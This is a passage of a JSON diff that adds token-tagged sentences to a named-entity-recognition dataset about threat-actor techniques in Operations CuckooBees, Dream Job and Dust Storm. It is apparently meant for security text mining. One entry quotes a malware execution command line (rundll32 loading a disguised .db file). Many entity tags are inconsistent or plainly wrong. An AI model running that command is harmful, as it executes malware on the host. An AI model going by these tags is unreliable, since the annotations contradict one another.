], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "generated", + "a", + "web", + "shell", + "within", + "a", + "vulnerable", + "Enterprise", + "Resource", + "Planning", + "Web", + "Application", + "Server", + "as", + "a", + "persistence", + "mechanism." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "used", + "batch", + "scripts", + "to", + "perform", + "reconnaissance." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "CuckooBees,", + "the", + "threat", + "actors", + "modified", + "the", + "`IKEEXT`", + "and", + "`PrintNotify`", + "Windows", + "services", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "archived", + "victim's", + "data", + "into", + "a", + "RAR", + "file." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "performed", + "brute", + "force", + "attacks", + "against", + "administrator", + "accounts." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "digitally", + "signed", + "their", + "own", + "malware", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "digitally", + "signed", + "their", + "malware", + "and", + "the", + "dbxcli", + "utility." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "code", + "signing", + "certificates", + "issued", + "by", + "Sectigo", + "RSA", + "for", + "some", + "of", + "its", + "malware", + "and", + "tools." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "malicious", + "Trojans", + "and", + "DLL", + "files", + "to", + "exfiltrate", + "data", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "B-SamFile", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "tools", + "that", + "used", + "the", + "`IsDebuggerPresent`", + "call", + "to", + "detect", + "debuggers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "queried", + "compromised", + "victim's", + "active", + "directory", + "servers", + "to", + "obtain", + "the", + "list", + "of", + "employees", + "including", + "administrator", + "accounts." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "registered", + "a", + "domain", + "name", + "identical", + "to", + "that", + "of", + "a", + "compromised", + "company", + "as", + "part", + "of", + "their", + "BEC", + "effort." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "compromised", + "domains", + "in", + "Italy", + "and", + "other", + "countries", + "for", + "their", + "C2", + "infrastructure." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "created", + "fake", + "email", + "accounts", + "to", + "correspond", + "with", + "fake", + "LinkedIn", + "personas;", + "Lazarus", + "Group", + "also", + "established", + "email", + "accounts", + "to", + "match", + "those", + "of", + "the", + "victim", + "as", + "part", + "of", + "their", + "BEC", + "attempt." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "encrypted", + "malware", + "such", + "as", + "DRATzarus", + "with", + "XOR", + "and", + "DLL", + "files", + "with", + "base64." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "exfiltrated", + "data", + "from", + "a", + "compromised", + "host", + "to", + "actor-controlled", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "a", + "custom", + "build", + "of", + "open-source", + "command-line", + "dbxcli", + "to", + "exfiltrate", + "stolen", + "data", + "to", + "Dropbox." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "removed", + "all", + "previously", + "delivered", + "files", + "from", + "a", + "compromised", + "computer." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "conducted", + "word", + "searches", + "within", + "documents", + "on", + "a", + "compromised", + "host", + "in", + "search", + "of", + "security", + "and", + "financial", + "matters." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "conducted", + "extensive", + "reconnaissance", + "research", + "on", + "potential", + "targets." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "gathered", + "victim", + "organization", + "information", + "to", + "identify", + "specific", + "targets." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "targeted", + "Windows", + "servers", + "running", + "Internet", + "Information", + "Systems", + "(IIS)", + "to", + "install", + "C2", + "components." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "targeted", + "specific", + "individuals", + "within", + "an", + "organization", + "with", + "tailored", + "job", + "vacancy", + "announcements." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "impersonated", + "HR", + "hiring", + "personnel", + "through", + "LinkedIn", + "messages", + "and", + "conducted", + "interviews", + "with", + "victims", + "in", + "order", + "to", + "deceive", + "them", + "into", + "downloading", + "malware." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "downloaded", + "multistage", + "malware", + "and", + "tools", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "conducted", + "internal", + "spearphishing", + "from", + "within", + "a", + "compromised", + "organization." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "lured", + "victims", + "into", + "executing", + "malicious", + "documents", + "that", + "contained", + "\"dream", + "job\"", + "descriptions", + "from", + "defense,", + "aerospace,", + "and", + "other", + "sectors." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "lured", + "users", + "into", + "executing", + "a", + "malicious", + "link", + "to", + "disclose", + "private", + "account", + "information", + "or", + "provide", + "initial", + "access." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "developed", + "custom", + "tools", + "such", + "as", + "Sumarta,", + "DBLL", + "Dropper,", + "Torisma,", + "and", + "DRATzarus", + "for", + "their", + "operations." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "disguised", + "malicious", + "template", + "files", + "as", + "JPEG", + "files", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "Windows", + "API", + "`ObtainUserAgentString`", + "to", + "obtain", + "the", + "victim's", + "User-Agent", + "and", + "used", + "the", + "value", + "to", + "connect", + "to", + "their", + "C2", + "server." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "PowerShell", + "commands", + "to", + "explore", + "the", + "environment", + "of", + "compromised", + "victims." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "placed", + "LNK", + "files", + "into", + "the", + "victims'", + "startup", + "folder", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "`regsvr32`", + "to", + "execute", + "malware." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "executed", + "malware", + "with", + "`C:\\\\windows\\system32\\rundll32.exe", + "\"C:\\ProgramData\\ThumbNail\\thumbnail.db\"`,", + "`CtrlPanel", + "S-6-81-3811-75432205-060098-6872", + "0", + "0", + "905`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "created", + "scheduled", + "tasks", + "to", + "set", + "a", + "periodic", + "execution", + "of", + "a", + "remote", + "XSL", + "script." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "acquired", + "servers", + "to", + "host", + "their", + "malicious", + "tools." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "compromised", + "servers", + "to", + "host", + "their", + "malicious", + "tools." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "LinkedIn", + "to", + "identify", + "and", + "target", + "employees", + "within", + "a", + "chosen", + "organization." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "created", + "fake", + "LinkedIn", + "accounts", + "for", + "their", + "targeting", + "efforts." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "packed", + "malicious", + ".db", + "files", + "with", + "Themida", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "sent", + "emails", + "with", + "malicious", + "attachments", + "to", + "gain", + "unauthorized", + "access", + "to", + "targets'", + "computers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "sent", + "malicious", + "OneDrive", + "links", + "with", + "fictitious", + "job", + "offer", + "advertisements", + "via", + "email." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "sent", + "victims", + "spearphishing", + "messages", + "via", + "LinkedIn", + "concerning", + "fictitious", + "jobs." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "an", + "AES", + "key", + "to", + "communicate", + "with", + "their", + "C2", + "server." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "tools", + "that", + "conducted", + "a", + "variety", + "of", + "system", + "checks", + "to", + "detect", + "sandboxes", + "or", + "VMware", + "services." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "deployed", + "malware", + "designed", + "not", + "to", + "run", + "on", + "computers", + "set", + "to", + "Korean,", + "Japanese,", + "or", + "Chinese", + "in", + "Windows", + "language", + "preferences." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "B-Area", + "O", + "B-Area", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "DOCX", + "files", + "to", + "retrieve", + "a", + "malicious", + "document", + "template/DOTM", + "file." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "tools", + "that", + "collected", + "`GetTickCount`", + "and", + "`GetSystemTimeAsFileTime`", + "data", + "to", + "detect", + "sandbox", + "or", + "VMware", + "services." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "obtained", + "tools", + "such", + "as", + "Wake-On-Lan,", + "Responder,", + "ChromePass,", + "and", + "dbxcli." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "compromised", + "servers", + "to", + "host", + "malware." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "multiple", + "servers", + "to", + "host", + "malicious", + "tools." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "executed", + "a", + "VBA", + "written", + "malicious", + "macro", + "after", + "victims", + "download", + "malicious", + "DOTM", + "files;", + "Lazarus", + "Group", + "also", + "used", + "Visual", + "Basic", + "macro", + "code", + "to", + "extract", + "a", + "double", + "Base64", + "encoded", + "DLL", + "implant." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Tool", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "uses", + "HTTP", + "and", + "HTTPS", + "to", + "contact", + "actor-controlled", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "file", + "hosting", + "services", + "like", + "DropBox", + "and", + "OneDrive." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "launched", + "malicious", + "DLL", + "files,", + "created", + "new", + "folders,", + "and", + "renamed", + "folders", + "with", + "the", + "use", + "of", + "the", + "Windows", + "command", + "shell." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "WMIC", + "to", + "executed", + "a", + "remote", + "XSL", + "script." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dream", + "Job,", + "Lazarus", + "Group", + "used", + "a", + "remote", + "XSL", + "script", + "to", + "download", + "a", + "Base64-encoded", + "DLL", + "custom", + "downloader." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "attackers", + "used", + "VBS", + "code", + "to", + "decode", + "payloads." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "B-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "established", + "domains", + "as", + "part", + "of", + "their", + "operational", + "infrastructure." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "used", + "a", + "watering", + "hole", + "attack", + "on", + "a", + "popular", + "software", + "reseller", + "to", + "exploit", + "the", + "then-zero-day", + "Internet", + "Explorer", + "vulnerability", + "CVE-2014-0322." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "used", + "dynamic", + "DNS", + "domains", + "from", + "a", + "variety", + "of", + "free", + "providers,", + "including", + "No-IP,", + "Oray,", + "and", + "3322." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Idus", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "established", + "email", + "addresses", + "to", + "register", + "domains", + "for", + "their", + "operations." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "encoded", + "some", + "payloads", + "with", + "a", + "single-byte", + "XOR,", + "both", + "skipping", + "the", + "key", + "itself", + "and", + "zeroing", + "in", + "an", + "attempt", + "to", + "avoid", + "exposing", + "the", + "key;", + "other", + "payloads", + "were", + "Base64-encoded." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "exploited", + "Adobe", + "Flash", + "vulnerability", + "CVE-2011-0611,", + "Microsoft", + "Windows", + "Help", + "vulnerability", + "CVE-2010-1885,", + "and", + "several", + "Internet", + "Explorer", + "vulnerabilities,", + "including", + "CVE-2011-1255,", + "CVE-2012-1889,", + "and", + "CVE-2014-0322." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "used", + "JavaScript", + "code." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + 